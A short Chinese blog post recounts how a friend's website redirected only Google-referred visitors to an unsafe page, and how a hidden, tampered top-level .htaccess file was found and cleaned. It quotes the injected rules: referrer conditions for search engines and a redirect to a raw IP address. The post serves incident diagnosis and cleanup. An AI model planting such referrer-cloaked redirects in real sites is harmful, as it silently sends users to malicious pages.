最近一个朋友碰到一个很奇怪的问题。

他的一个网站直接通过域名访问完全没有问题。

但是如果从google搜索得到的结果点击之后就会跳转到一个不安全的页面中去。

从百度的也正常。

对这个网站进行分析过之后发现这个网站的代码完全没有问题。

后来分析网站确定为网站的.htaccess被篡改导致的。

可是通过FTP文件没有在改网站目录下面找到。

后来通过命令模式登陆ftp

ls -a命令得到在最上层目录上有个.htaccess。

使用 get命令下载该文件后发现,有异常代码

 
  1. RewriteEngine On 
  2. RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] 
  3. RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] 
  4. RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] 
  5. RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] 
  6. RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] 
  7. RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] 
  8. RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L] 

 

删除RewriteRule这条记录。上传覆盖文件即可。